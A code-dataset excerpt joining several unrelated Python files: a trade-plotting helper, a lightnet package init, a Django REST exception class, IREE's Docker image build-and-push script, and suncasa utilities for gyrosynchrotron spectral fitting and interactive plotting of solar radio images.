if pos_arr[i+1] == 0:
avg_price[i+1] = 0.0
else:
pos_diff = pos_arr[i+1] - pos_arr[i]
if pos_arr[i] == 0 or pos_diff * pos_arr[i] > 0:
count = True
else:
count = False
if count:
avg_price[i+1] = (avg_price[i] * pos_arr[i] + pos_diff * price_arr[i+1]) * 1. / pos_arr[i+1]
else:
avg_price[i+1] = avg_price[i]
return avg_price
def plot_trades(df, symbol="", save_folder='.', marker_size_adjust_ratio=0.1):
old_mpl_rcparams = {k: v for k, v in mpl.rcParams.items()}
mpl.rcParams.update(MPL_RCPARAMS)
idx0 = df.index
idx = range(len(idx0))
price = df.loc[:, 'close']
bv, sv = df.loc[:, 'BuyVolume'].values, df.loc[:, 'SellVolume'].values
profit = df.loc[:, 'CumProfit'].values
avgpx = df.loc[:, 'AvgPosPrice']
bv_m = np.max(bv)
sv_m = np.max(sv)
if bv_m > 0:
bv = bv / bv_m * 100
if sv_m > 0:
sv = sv / sv_m * 100
fig = plt.figure(figsize=(14, 10))
ax1 = plt.subplot2grid((4, 1), (0, 0), rowspan=3)
ax3 = plt.subplot2grid((4, 1), (3, 0), rowspan=1, sharex=ax1)
ax2 = ax1.twinx()
ax1.plot(idx, price, label='Price', linestyle='-', lw=1, marker='', color='yellow')
ax1.scatter(idx, price, label='buy', marker='o', s=bv, color='indianred')
ax1.scatter(idx, price, label='sell', marker='o', s=sv, color='forestgreen')
ax1.plot(idx, avgpx, lw=1, marker='', color='green')
ax1.legend(loc='upper left')
ax1.set(title="Price, Trades and PnL for {:s}".format(symbol), ylabel="Price ($)")
ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m'))
ax2.plot(idx, profit, label='PnL', color='k', lw=1, ls='--', alpha=.4)
ax2.legend(loc='upper right')
ax2.set(ylabel="Profit / Loss ($)")
# ax1.xaxis.set_major_formatter(MyFormatter(df.index))#, '%H:%M'))
ax3.plot(idx, df.loc[:, 'position'], marker='D', markersize=3, lw=2)
ax3.axhline(0, color='k', lw=1, ls='--', alpha=0.8)
ax3.set(title="Position of {:s}".format(symbol))
fig.tight_layout()
fig.savefig(save_folder + '/' + "{}.png".format(symbol), facecolor=fig.get_facecolor(), dpi=fig.get_dpi())
mpl.rcParams.update(old_mpl_rcparams)
| 2.171875 | 2 |
lightnet/data/transform/__init__.py | eavise-kul/lightnet | 6 | 11352 | #
# Lightnet data transforms
# Copyright EAVISE
#
from .pre import *
from .post import *
from .util import *
| 0.863281 | 1 |
ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 0 | 11353 | from rest_framework import status
from rest_framework.exceptions import APIException
class BadSource(APIException):
"""
Exception for when a lazily-loaded data source can't
be accessed for some reason
"""
status_code = status.HTTP_417_EXPECTATION_FAILED
default_code = 'bad_source'
def __init__(self, source: str, reason: str):
super().__init__(f"Bad source '{source}': {reason}")
| 2.53125 | 3 |
build_tools/docker/manage_images.py | BernhardRiemann/iree | 1 | 11354 | <filename>build_tools/docker/manage_images.py
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages IREE Docker image definitions.
Includes information on their dependency graph and GCR URL.
Example usage:
Rebuild the cmake image and all images that transitiviely on depend on it,
tagging them with `latest`:
python3 build_tools/docker/manage_images.py --build --image cmake
Print out output for rebuilding the cmake image and all images that
transitiviely on depend on it, but don't take side-effecting actions:
python3 build_tools/docker/manage_images.py --build --image cmake --dry-run
Push all `prod` images to GCR:
python3 build_tools/docker/manage_images.py --push --tag prod --images all
Rebuild and push all images and update references to them in the repository:
python3 build_tools/docker/manage_images.py --push --images all
--update-references
"""
import argparse
import fileinput
import os
import posixpath
import re
import subprocess
import sys
IREE_GCR_URL = 'gcr.io/iree-oss/'
DOCKER_DIR = 'build_tools/docker/'
# Map from image names to images that they depend on.
IMAGES_TO_DEPENDENCIES = {
'base': [],
'bazel': ['base', 'util'],
'bazel-python': ['bazel'],
'bazel-tensorflow': ['bazel-python'],
'bazel-tensorflow-nvidia': ['bazel-tensorflow-vulkan'],
'bazel-tensorflow-swiftshader': ['bazel-tensorflow-vulkan', 'swiftshader'],
'bazel-tensorflow-vulkan': ['bazel-tensorflow'],
'cmake': ['base', 'util'],
'cmake-android': ['cmake', 'util'],
'cmake-python': ['cmake'],
'cmake-python-nvidia': ['cmake-python-vulkan'],
'cmake-python-swiftshader': ['cmake-python-vulkan', 'swiftshader'],
'cmake-python-vulkan': ['cmake-python'],
'rbe-toolchain': [],
'swiftshader': ['cmake'],
'util': [],
}
IMAGES_TO_DEPENDENT_IMAGES = {k: [] for k in IMAGES_TO_DEPENDENCIES}
for image, dependencies in IMAGES_TO_DEPENDENCIES.items():
for dependency in dependencies:
IMAGES_TO_DEPENDENT_IMAGES[dependency].append(image)
IMAGES_HELP = [f'`{name}`' for name in IMAGES_TO_DEPENDENCIES]
IMAGES_HELP = f'{", ".join(IMAGES_HELP)} or `all`'
def parse_arguments():
"""Parses command-line options."""
parser = argparse.ArgumentParser(
description="Build IREE's Docker images and optionally push them to GCR.")
parser.add_argument(
'--images',
'--image',
type=str,
required=True,
action='append',
help=f'Name of the image to build: {IMAGES_HELP}.')
parser.add_argument(
'--tag',
type=str,
default='latest',
help='Tag for the images to build. Defaults to `latest` (which is good '
'for testing changes in a PR). Use `prod` to update the images that the '
'CI caches.')
parser.add_argument(
'--pull',
action='store_true',
help='Pull the specified image before building.')
parser.add_argument(
'--build',
action='store_true',
help='Build new images from the current Dockerfiles.')
parser.add_argument(
'--push',
action='store_true',
help='Push the built images to GCR. Requires gcloud authorization.')
parser.add_argument(
'--update_references',
'--update-references',
action='store_true',
help='Update all references to the specified images to point at the new'
' digest.')
parser.add_argument(
'--dry_run',
'--dry-run',
'-n',
action='store_true',
help='Print output without building or pushing any images.')
args = parser.parse_args()
for image in args.images:
if image == 'all':
# Sort for a determinstic order
args.images = sorted(IMAGES_TO_DEPENDENCIES.keys())
elif image not in IMAGES_TO_DEPENDENCIES:
raise parser.error('Expected --image to be one of:\n'
f' {IMAGES_HELP}\n'
f'but got `{image}`.')
return args
def get_ordered_images_to_process(images):
unmarked_images = list(images)
# Python doesn't have a builtin OrderedSet
marked_images = set()
order = []
def visit(image):
if image in marked_images:
return
for dependent_images in IMAGES_TO_DEPENDENT_IMAGES[image]:
visit(dependent_images)
marked_images.add(image)
order.append(image)
while unmarked_images:
visit(unmarked_images.pop())
order.reverse()
return order
def stream_command(command, dry_run=False):
print(f'Running: `{" ".join(command)}`')
if dry_run:
return 0
process = subprocess.Popen(
command,
bufsize=1,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
universal_newlines=True)
for line in process.stdout:
print(line, end='')
if process.poll() is None:
raise RuntimeError('Unexpected end of output while process is not finished')
return process.poll()
def check_stream_command(command, dry_run=False):
exit_code = stream_command(command, dry_run=dry_run)
if exit_code != 0:
print(f'Command failed with exit code {exit_code}: `{" ".join(command)}`')
sys.exit(exit_code)
def get_repo_digest(image):
inspect_command = [
'docker',
'image',
'inspect',
f'{image}',
'-f',
'{{index .RepoDigests 0}}',
]
inspect_process = subprocess.run(
inspect_command,
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
timeout=10)
if inspect_process.returncode != 0:
print(f'Computing the repository digest for {image} failed.'
' Has it been pushed to GCR?')
print(f'Output from `{" ".join(inspect_command)}`:')
print(inspect_process.stdout, end='')
print(inspect_process.stderr, end='')
sys.exit(inspect_process.returncode)
_, repo_digest = inspect_process.stdout.strip().split('@')
return repo_digest
def update_rbe_reference(digest, dry_run=False):
print('Updating WORKSPACE file for rbe-toolchain')
for line in fileinput.input(files=['WORKSPACE'], inplace=(not dry_run)):
if line.strip().startswith('digest ='):
print(re.sub('sha256:[a-zA-Z0-9]+', digest, line), end='')
else:
print(line, end='')
def update_references(image_name, digest, dry_run=False):
print(f'Updating references to {image_name}')
grep_command = ['git', 'grep', '-l', f'{image_name}@sha256']
grep_process = subprocess.run(
grep_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
timeout=5,
universal_newlines=True)
if grep_process.returncode > 1:
print(f'{" ".join(grep_command)} '
f'failed with exit code {grep_process.returncode}')
sys.exit(grep_process.returncode)
if grep_process.returncode == 1:
print(f'Found no references to {image_name}')
return
files = grep_process.stdout.split()
print(f'Updating references in {len(files)} files: {files}')
for line in fileinput.input(files=files, inplace=(not dry_run)):
print(
re.sub(f'{image_name}@sha256:[a-zA-Z0-9]+', f'{image_name}@{digest}',
line),
end='')
if __name__ == '__main__':
args = parse_arguments()
# Ensure the user has the correct authorization if they try to push to GCR.
if args.push:
if stream_command(['which', 'gcloud']) != 0:
print('gcloud not found.'
' See https://cloud.google.com/sdk/install for installation.')
sys.exit(1)
check_stream_command(['gcloud', 'auth', 'configure-docker'],
dry_run=args.dry_run)
images_to_process = get_ordered_images_to_process(args.images)
print(f'Also processing dependent images. Will process: {images_to_process}')
for image in images_to_process:
print(f'Processing image {image}')
image_name = posixpath.join(IREE_GCR_URL, image)
image_tag = f'{image_name}:{args.tag}'
image_path = os.path.join(DOCKER_DIR, image)
if args.pull:
check_stream_command(['docker', 'pull', image_tag], dry_run=args.dry_run)
if args.build:
check_stream_command(['docker', 'build', '--tag', image_tag, image_path],
dry_run=args.dry_run)
if args.push:
check_stream_command(['docker', 'push', image_tag], dry_run=args.dry_run)
if args.update_references:
digest = get_repo_digest(image_tag)
# Just hardcode this oddity
if image == 'rbe-toolchain':
update_rbe_reference(digest, dry_run=args.dry_run)
update_references(image_name, digest, dry_run=args.dry_run)
| 1.898438 | 2 |
suncasa/pygsfit/gsutils.py | wyq24/suncasa | 0 | 11355 | <reponame>wyq24/suncasa<filename>suncasa/pygsfit/gsutils.py
import numpy as np
# import sys
import math
import os, sys, platform
import astropy.units as u
from sunpy import map as smap
from astropy.coordinates import SkyCoord
from suncasa.io import ndfits
import lmfit
from astropy.time import Time
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib.colorbar as colorbar
from suncasa.utils import mstools
from suncasa.utils import qlookplot as ql
from mpl_toolkits.axes_grid1 import make_axes_locatable
from tqdm import tqdm
from astropy.io import fits
import numpy.ma as ma
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
import gstools
# name of the fast gyrosynchrotron codes shared library
if platform.system() == 'Linux' or platform.system() == 'Darwin':
libname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'binaries/MWTransferArr.so')
if platform.system() == 'Windows':
libname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'binaries/MWTransferArr64.dll')
def kev2k(eng):
return 11604525.00617 * eng
def ff_emission(em, T=1.e7, Z=1., mu=1.e10):
from astropy import constants as const
import astropy.units as u
T = T * u.k
mu = mu * u.Hz
esu = const.e.esu
k_B = const.k_B.cgs
m_e = const.m_e.cgs
c = const.c.cgs
bmax = (3 * k_B * T * u.k / m_e) ** 0.5 / 2.0 / np.pi / (mu * u.Hz)
bmin = Z * esu ** 2 / 3. / k_B / T
lnbb = np.log((bmax / bmin).value)
ka_mu = 1. / mu ** 2 / T ** 1.5 * (
Z ** 2 * esu ** 6 / c / np.sqrt(2. * np.pi * (m_e * k_B) ** 3)) * np.pi ** 2 / 4.0 * lnbb
# print(ka_mu, em)
opc = ka_mu * em
return T.value * (1 - np.exp(-opc.value))
def sfu2tb(freq, flux, area):
# frequency in Hz
# flux in sfu
# area: area of the radio source in arcsec^2
sfu2cgs = 1e-19
vc = 2.998e10
kb = 1.38065e-16
# sr = np.pi * (size[0] / 206265. / 2.) * (size[1] / 206265. / 2.)
sr = area / 206265. ** 2
Tb = flux * sfu2cgs * vc ** 2. / (2. * kb * freq ** 2. * sr)
return Tb
def tb2sfu(freq, tb, area):
# frequency in Hz
# brightness temperature in K
# area: area of the radio source in arcsec^2
sfu2cgs = 1e-19
vc = 2.998e10
kb = 1.38065e-16
# sr = np.pi * (size[0] / 206265. / 2.) * (size[1] / 206265. / 2.)
sr = area / 206265. ** 2
flux = tb / (sfu2cgs * vc ** 2. / (2. * kb * freq ** 2. * sr))
return flux
def initspecplot(axes, cplts):
errobjs = []
for cpltidx, cplt in enumerate(cplts):
errobjs.append(axes.errorbar([], [], yerr=[], linestyle='', marker='o', mfc='none', mec=cplt, alpha=1.0))
axes.set_yscale("log")
axes.set_xscale("log")
axes.set_xlim([1, 20])
axes.set_ylim([0.1, 1000])
axes.set_xticks([1, 5, 10, 20])
axes.set_xticklabels([1, 5, 10, 20])
axes.set_xticks([1, 5, 10, 20])
axes.set_yticks([])
axes.set_yticks([0.01, 0.1, 1, 10, 100, 1000])
axes.set_ylabel('T$_b$ [MK]')
axes.set_xlabel('Frequency [GHz]')
x = np.linspace(1, 20, 10)
for ll in [-1, 0, 1, 2, 3, 4]:
y = 10. ** (-2 * np.log10(x) + ll)
axes.plot(x, y, 'k--', alpha=0.1)
# y2 = 10. ** (-4 * np.log10(x) + ll)
# y3 = 10. ** (-8 * np.log10(x) + ll)
# ax_eospec.plot(x, y, 'k--', x, y2, 'k:', x, y3, 'k-.', alpha=0.1)
return errobjs
def set_errorobj(xout, yout, errobj, yerr=None):
eospec, dummy, (errbar_eospec,) = errobj
eospec.set_data(xout, yout)
if yerr is not None:
yerr_top = yout + yerr
yerr_bot = yout - yerr
new_segments_y = [np.array([[x, yt], [x, yb]]) for x, yt, yb in zip(xout, yerr_top, yerr_bot)]
errbar_eospec.set_segments(new_segments_y)
def mwspec2min_1src(params, freqghz, tb=None, tb_err=None, arcsec2cm=0.725e8, showplt=False):
# params are defined by lmfit.Paramters()
'''
params: parameters defined by lmfit.Paramters()
freqghz: frequencies in GHz
ssz: pixel size in arcsec
tb: reference brightness temperature in K
tb_err: uncertainties of reference brightness temperature in K
'''
from scipy import interpolate
GET_MW = gstools.initGET_MW(libname) # load the library
ssz = float(params['ssz'].value) # # source area in arcsec^2
depth = float(params['depth'].value) # total source depth in arcsec
Bmag = float(params['Bmag'].value) # magnetic field strength in G
Tth = float(params['Tth'].value) # thermal temperature in MK
nth = float(params['nth'].value) # thermal density in 1e10 cm^{-3}
nrlh = 10. ** float(params['lognrlh'].value) # total nonthermal density above 0.1 MeV
delta = float(params['delta'].value) # powerlaw index
theta = float(params['theta'].value) # viewing angle in degrees
Emin = float(params['Emin'].value) # low energy cutoff of nonthermal electrons in MeV
Emax = float(params['Emax'].value) # high energy cutoff of nonthermal electrons in MeV
E_hi = 0.1
nrl = nrlh * (Emin ** (1. - delta) - Emax * (1. - delta)) / (E_hi ** (1. - delta) - Emax ** (1. - delta))
Nf = 100 # number of frequencies
NSteps = 1 # number of nodes along the line-of-sight
N_E = 15 # number of energy nodes
N_mu = 15 # number of pitch-angle nodes
Lparms = np.zeros(11, dtype='int32') # array of dimensions etc.
Lparms[0] = NSteps
Lparms[1] = Nf
Lparms[2] = N_E
Lparms[3] = N_mu
Rparms = np.zeros(5, dtype='double') # array of global floating-point parameters
Rparms[0] = ssz * arcsec2cm ** 2 # Area, cm^2
# Rparms[0] = 1e20 # area, cm^2
Rparms[1] = 1e9 # starting frequency to calculate spectrum, Hz
Rparms[2] = 0.02 # logarithmic step in frequency
Rparms[3] = 12 # f^C
Rparms[4] = 12 # f^WH
ParmLocal = np.zeros(24, dtype='double') # array of voxel parameters - for a single voxel
ParmLocal[0] = depth * arcsec2cm / NSteps # voxel depth, cm
ParmLocal[1] = Tth * 1e6 # T_0, K
ParmLocal[2] = nth * 1e10 # n_0 - thermal electron density, cm^{-3}
ParmLocal[3] = Bmag # B - magnetic field, G
Parms = np.zeros((24, NSteps), dtype='double', order='F') # 2D array of input parameters - for multiple voxels
for i in range(NSteps):
Parms[:, i] = ParmLocal # most of the parameters are the same in all voxels
# if NSteps > 1:
# Parms[4, i] = 50.0 + 30.0 * i / (NSteps - 1) # the viewing angle varies from 50 to 80 degrees along the LOS
# else:
# Parms[4, i] = 50.0 # the viewing angle varies from 50 to 80 degrees along the LOS
Parms[4, i] = theta
# parameters of the electron distribution function
n_b = nrl # n_b - nonthermal electron density, cm^{-3}
mu_c = np.cos(np.pi * 70 / 180) # loss-cone boundary
dmu_c = 0.2 # Delta_mu
E_arr = np.logspace(np.log10(Emin), np.log10(Emax), N_E, dtype='double') # energy grid (logarithmically spaced)
mu_arr = np.linspace(-1.0, 1.0, N_mu, dtype='double') # pitch-angle grid
f0 = np.zeros((N_E, N_mu), dtype='double') # 2D distribution function array - for a single voxel
# computing the distribution function (equivalent to PLW & GLC)
A = n_b / (2.0 * np.pi) * (delta - 1.0) / (Emin ** (1.0 - delta) - Emax ** (1.0 - delta))
B = 0.5 / (mu_c + dmu_c * np.sqrt(np.pi) / 2 * math.erf((1.0 - mu_c) / dmu_c))
for i in range(N_E):
for j in range(N_mu):
amu = abs(mu_arr[j])
f0[i, j] = A * B * E_arr[i] ** (-delta) * (1.0 if amu < mu_c else np.exp(-((amu - mu_c) / dmu_c) ** 2))
f_arr = np.zeros((N_E, N_mu, NSteps), dtype='double',
order='F') # 3D distribution function array - for multiple voxels
for k in range(NSteps):
f_arr[:, :, k] = f0 # electron distribution function is the same in all voxels
RL = np.zeros((7, Nf), dtype='double', order='F') # input/output array
# calculating the emission for array distribution (array -> on)
res = GET_MW(Lparms, Rparms, Parms, E_arr, mu_arr, f_arr, RL)
if res:
# retrieving the results
f = RL[0]
I_L = RL[5]
I_R = RL[6]
if showplt:
import matplotlib.pyplot as plt
fig, ax = plt.subplots(1, 1)
ax.plot(f, I_L + I_R)
ax.set_xscale('log')
ax.set_yscale('log')
ax.set_title('Total intensity (array)')
ax.set_xlabel('Frequency, GHz')
ax.set_ylabel('Intensity, sfu')
flx_model = I_L + I_R
flx_model = np.nan_to_num(flx_model) + 1e-11
logf = np.log10(f)
logflx_model = np.log10(flx_model)
logfreqghz = np.log10(freqghz)
interpfunc = interpolate.interp1d(logf, logflx_model, kind='linear')
logmflx = interpfunc(logfreqghz)
mflx = 10. ** logmflx
mtb = sfu2tb(np.array(freqghz) * 1.e9, mflx, ssz)
else:
print("Calculation error!")
if tb is None:
return mtb
if tb_err is None:
# return mTb - Tb
return mtb - tb
# wt = 1./flx_err
# wt = 1./(Tb_err/Tb/np.log(10.))
# residual = np.abs((logmTb - np.log10(Tb))) * wt
# residual = np.abs((mflx - flx)) * wt
residual = (mtb - tb) / tb_err
return residual
class RegionSelector:
# def set_errorobj(self, xout, yout, errobj, yerr):
# eospec, dummy, (errbar_eospec,) = errobj
# eospec.set_data(xout, yout)
# if yerr is not None:
# yerr_top = yout + yerr
# yerr_bot = yout - yerr
# new_segments_y = [np.array([[x, yt], [x, yb]]) for x, yt, yb in zip(xout, yerr_top, yerr_bot)]
# errbar_eospec.set_segments(new_segments_y)
# return 1
def subdata(self, xs, ys, rfile):
rmap, rdata, rheader, ndim, npol_fits, stokaxis, rfreqs, rdelts = ndfits.read(rfile)
ny, nx = rmap.data.shape
tr_coord = rmap.top_right_coord
bl_coord = rmap.bottom_left_coord
x0 = bl_coord.Tx.to(u.arcsec).value
y0 = bl_coord.Ty.to(u.arcsec).value
x1 = tr_coord.Tx.to(u.arcsec).value
y1 = tr_coord.Ty.to(u.arcsec).value
dx = rmap.scale.axis1.to(u.arcsec / u.pix).value
dy = rmap.scale.axis2.to(u.arcsec / u.pix).value
mapx, mapy = np.linspace(x0, x1, nx) - dx / 2.0, np.linspace(y0, y1, ny) - dy / 2.0
xsmin = np.nanmin(xs)
xsmax = np.nanmax(xs)
ysmin = np.nanmin(ys)
ysmax = np.nanmax(ys)
if np.abs(xsmax - xsmin) < dx:
xsmax = xsmin + dx
if np.abs(ysmax - ysmin) < dy:
ysmax = ysmin + dy
xmask = np.logical_and(mapx >= xsmin, mapx <= xsmax)
nxnew = np.count_nonzero(xmask)
ymask = np.logical_and(mapy >= ysmin, mapy <= ysmax)
nynew = np.count_nonzero(ymask)
xmask = np.tile(xmask, ny).reshape(ny, nx)
ymask = np.tile(ymask, nx).reshape(nx, ny).transpose()
mask = xmask & ymask
# print(np.count_nonzero(mask))
self.npix = np.count_nonzero(mask)
self.area = self.npix * dx * dy
data = rdata[:, mask]
# print(rdata[:, :, mask])
# print(mask.shape, rdata.shape, data.shape)
data = np.squeeze(data)
# print(data.shape)
return data
def __init__(self, clkpnts, boxlines, eofiles, errobjs, cfreqs=None, rms=None, eofile_ref=None, errobj_ref=None,
wTmap=None, outspec_ff=None, scatter_gsfit=None,
get_peak=False, get_sum=False):
self.boxline = []
self.clkpnt = []
self.xs = list(clkpnts[0].get_xdata())
self.ys = list(clkpnts[0].get_ydata())
self.npix = None
self.area = None
self.xout = []
self.yout = []
self.xouterr = []
self.youterr = []
for errobj in errobjs:
eospec, dummy, (errbar_eospec,) = errobj
self.xout.append(eospec.get_xdata())
self.yout.append(eospec.get_ydata())
self.errobjs = errobjs
self.errobj_ref = errobj_ref
self.outspec_ff = outspec_ff
self.scatter_gsfit = scatter_gsfit
self.cfreqs = cfreqs
self.rms = rms
self.eofiles = eofiles
self.eofile_ref = eofile_ref
self.wTmap = wTmap
self.wT = None
self.em = None
self.get_peak = get_peak
self.get_sum = get_sum
self.tps = []
self.params = None
for idx, s in enumerate(clkpnts):
self.boxline.append(boxlines[idx])
self.clkpnt.append(s)
self.cid = s.figure.canvas.mpl_connect('button_press_event', self)
def __call__(self, event):
axes = [clkpnt.axes for clkpnt in self.clkpnt]
if self.clkpnt[0].figure.canvas.toolbar.mode == '':
if event.inaxes not in axes:
return
nxs = len(self.xs)
if event.button == 1:
if nxs < 2:
self.xs.append(event.xdata)
self.ys.append(event.ydata)
else:
self.xs = [event.xdata]
self.ys = [event.ydata]
elif event.button == 3:
if len(self.xs) > 0:
self.xs.pop()
self.ys.pop()
self.get_flux()
def get_flux(self):
if len(self.xs) > 0:
xs = np.array(self.xs, dtype=np.float64)
ys = np.array(self.ys, dtype=np.float64)
for clkpnt in self.clkpnt:
clkpnt.set_data(xs, ys)
else:
for clkpnt in self.clkpnt:
clkpnt.set_data([], [])
nxs = len(self.xs)
if nxs <= 1:
for line in self.boxline:
line.set_data([], [])
elif nxs == 2:
datas = []
# eofile = self.eofiles[0]
# rmap, rdata, rheader, ndim, npol_fits, stokaxis, rfreqs, rdelts = ndfits.read(eofile)
# data = self.subdata(xs, ys, eofile)
# datas.append(data)
for tidx, eofile in enumerate(self.eofiles):
data = self.subdata(xs, ys, eofile)
datas.append(data)
if self.eofile_ref is not None:
data_ref = self.subdata(xs, ys, self.eofile_ref)
if self.wTmap is not None:
datawT = self.subdata(xs, ys, self.wTmap)
if self.get_peak:
youts_outspec = []
for data in datas:
if data.ndim > 1:
youts_outspec.append(np.nanmax(data, axis=-1) / 1e6)
else:
youts_outspec.append(data / 1e6)
if self.eofile_ref is not None:
youts_outspec_ref = np.nanmax(data_ref[0, dd, :, :]) / 1e6
else:
youts_outspec = []
for data in datas:
if data.ndim > 1:
youts_outspec.append(np.nanmean(data, axis=-1) / 1e6)
else:
youts_outspec.append(data / 1e6)
if self.eofile_ref is not None:
if data.ndim > 1:
youts_outspec_ref = np.nanmean(data_ref, axis=-1) / 1e6
else:
youts_outspec_ref = data_ref / 1e6
self.tps = []
for data in datas:
if data.ndim > 1:
self.tps.append(np.nansum(data, axis=-1) / 1e6)
else:
self.tps.append(data / 1e6)
xout = self.cfreqs
for tidx, errobj in enumerate(self.errobjs):
set_errorobj(xout, youts_outspec[tidx], errobj, self.rms)
if self.eofile_ref is not None:
set_errorobj(xout, youts_outspec_ref, self.errobj_ref, self.rms)
if self.wTmap is not None:
print(datawT.shape)
wT = np.nanmean(datawT[..., 1]) * 1e6
em = np.nanmean(datawT[..., 0])
arcsec2cm = (self.wTmap[0].rsun_meters / self.wTmap[0].rsun_obs).to(u.cm / u.arcsec).value
# nele = 4.0e10
# depth = em / nele ** 2 / arcsec2cm
# print('Temperature: {:.1f} MK, EM: {:.2e} cm-5, depth: {:.1f} arcsec if nele is {:.2e} cm-3'.format(wT / 1e6, em, depth, nele))
depth = 20. ## arcsec
nele = np.sqrt(em / (depth * arcsec2cm))
print('Temperature: {:.1f} MK, EM: {:.2e} cm-5, nele: {:.2e} cm-3 if depth is {:.1f} arcsec'.format(
wT / 1e6, em, nele, depth))
self.wT = wT
self.em = em
yout_ff = np.array([ff_emission(em, T=wT, Z=1., mu=ll) for ll in xout * 1e9]) / 1.e6
self.outspec_ff.set_data(xout, yout_ff)
self.errobjs[0][0].figure.canvas.draw_idle()
for line in self.boxline:
line.set_data([xs[0], xs[1], xs[1], xs[0], xs[0]], [ys[0], ys[0], ys[1], ys[1], ys[0]])
clkpnt.figure.canvas.draw_idle()
class GStool:
# def get_showaia(self):
# return self._showaia
#
# def set_showaia(self, value):
# self._showaia = value
#
# showaia = property(fget=get_showaia, fset=set_showaia, doc="`Boolean`-like: Display AIA image or not")
def __init__(self, eofiles, aiafile=None, xycen=None, fov=None, freqghz_bound=[-1, 100], calpha=0.5,
clevels=np.array([0.3, 1.0]), opencontour=None):
self.aiafile = aiafile
self.eofiles = eofiles
self.xycen = xycen
self.fov = fov
self.calpha = calpha
self.clevels = clevels
self.freqghz_bound = freqghz_bound
self.opencontour = opencontour
self._showaia = False
rmap, rdata, rheader, ndim, npol_fits, stokaxis, rfreqs, rdelts = ndfits.read(eofiles[0])
self.bdinfo = bdinfo = ndfits.get_bdinfo(rfreqs, rdelts)
self.cfreqs = cfreqs = bdinfo['cfreqs']
self.cfreqs_all = cfreqs_all = bdinfo['cfreqs_all']
self.freq_dist = lambda fq: (fq - cfreqs_all[0]) / (cfreqs_all[-1] - cfreqs_all[0])
self.ntim = ntim = len(eofiles)
self.xlim = xlim = xycen[0] + np.array([-1, 1]) * 0.5 * fov[0]
self.ylim = ylim = xycen[1] + np.array([-1, 1]) * 0.5 * fov[1]
nspw = len(rfreqs)
eodate = Time(rmap.date.mjd + rmap.exposure_time.value / 2. / 24 / 3600, format='mjd')
ny, nx = rmap.data.shape
x0, x1 = (np.array([1, rmap.meta['NAXIS1']]) - rmap.meta['CRPIX1']) * rmap.meta['CDELT1'] + \
rmap.meta['CRVAL1']
y0, y1 = (np.array([1, rmap.meta['NAXIS2']]) - rmap.meta['CRPIX2']) * rmap.meta['CDELT2'] + \
rmap.meta['CRVAL2']
dx = rmap.meta['CDELT1']
dy = rmap.meta['CDELT2']
mapx, mapy = np.linspace(x0, x1, nx), np.linspace(y0, y1, ny)
fig = plt.figure(figsize=(15, 6))
self.fig = fig
grids = fig.add_gridspec(ncols=3, nrows=1, width_ratios=[1, 1, 0.6])
self.grids = grids
axs = []
axs.append(fig.add_subplot(grids[0, 0]))
axs.append(fig.add_subplot(grids[0, 1], sharex=axs[-1], sharey=axs[-1]))
axs.append(fig.add_subplot(grids[0, 2]))
if aiafile:
if os.path.exists(aiafile):
try:
aiacmap = plt.get_cmap('gray_r')
aiamap = smap.Map(aiafile)
ax = axs[0]
aiamap.plot(axes=ax, cmap=aiacmap)
ax = axs[1]
aiamap.plot(axes=ax, cmap=aiacmap)
self._showaia = True
except:
self._showaia = False
if self._showaia:
if self.opencontour is None:
self.opencontour = False
else:
if self.opencontour is None:
self.opencontour = True
## Plot EOVSA images as filled contour on top of the AIA image
icmap = plt.get_cmap('RdYlBu')
cts = []
## color map for spectra from the image series
tcmap = plt.get_cmap('turbo')
for s, sp in enumerate(rfreqs):
data = rdata[s, ...]
clvls = clevels * np.nanmax(data)
rcmap = [icmap(self.freq_dist(self.cfreqs[s]))] * len(clvls)
if self.opencontour:
cts.append(ax.contour(mapx, mapy, data, levels=clvls,
colors=rcmap,
alpha=calpha))
else:
cts.append(ax.contourf(mapx, mapy, data, levels=clvls,
colors=rcmap,
alpha=calpha))
ax.set_xlim(self.xlim)
ax.set_ylim(self.ylim)
for ax in axs[:2]:
ax.set_xlabel('Solar-X [arcsec]')
ax.set_ylabel('Solar-y [arcsec]')
ax.set_title('')
ax.text(0.02, 0.01,
' '.join(['AIA {:.0f} Å'.format(aiamap.wavelength.value),
aiamap.date.datetime.strftime('%Y-%m-%dT%H:%M:%S')]),
ha='left',
va='bottom',
color='k', transform=ax.transAxes)
ax.text(0.02, 0.05, ' '.join(['EOVSA ', eodate.datetime.strftime('%Y-%m-%dT%H:%M:%S')]), ha='left',
va='bottom',
color='k', transform=ax.transAxes)
divider = make_axes_locatable(axs[0])
cax = divider.append_axes("right", size="8%", pad=0.08)
cax.set_visible(False)
divider = make_axes_locatable(axs[1])
cax = divider.append_axes("right", size="8%", pad=0.08)
ticks, bounds, vmax, vmin, freqmask = ql.get_colorbar_params(bdinfo)
cb = colorbar.ColorbarBase(cax, norm=colors.Normalize(vmin=vmin, vmax=vmax), cmap=icmap,
orientation='vertical', boundaries=bounds, spacing='proportional',
ticks=ticks, format='%4.1f', alpha=calpha)
for fbd_lo, fbd_hi in freqmask:
if fbd_hi is not None:
cax.axhspan(fbd_lo, fbd_hi, hatch='//', edgecolor='k', facecolor='#BBBBBB')
plt.text(0.5, 1.05, 'MW', ha='center', va='bottom', transform=cax.transAxes, color='k', fontweight='normal')
plt.text(0.5, 1.01, '[GHz]', ha='center', va='bottom', transform=cax.transAxes, color='k',
fontweight='normal')
cax.xaxis.set_visible(False)
cax.tick_params(axis="y", pad=-20., length=0, colors='k', labelsize=7)
cax.axhline(vmin, xmin=1.0, xmax=1.2, color='k', clip_on=False)
cax.axhline(vmax, xmin=1.0, xmax=1.2, color='k', clip_on=False)
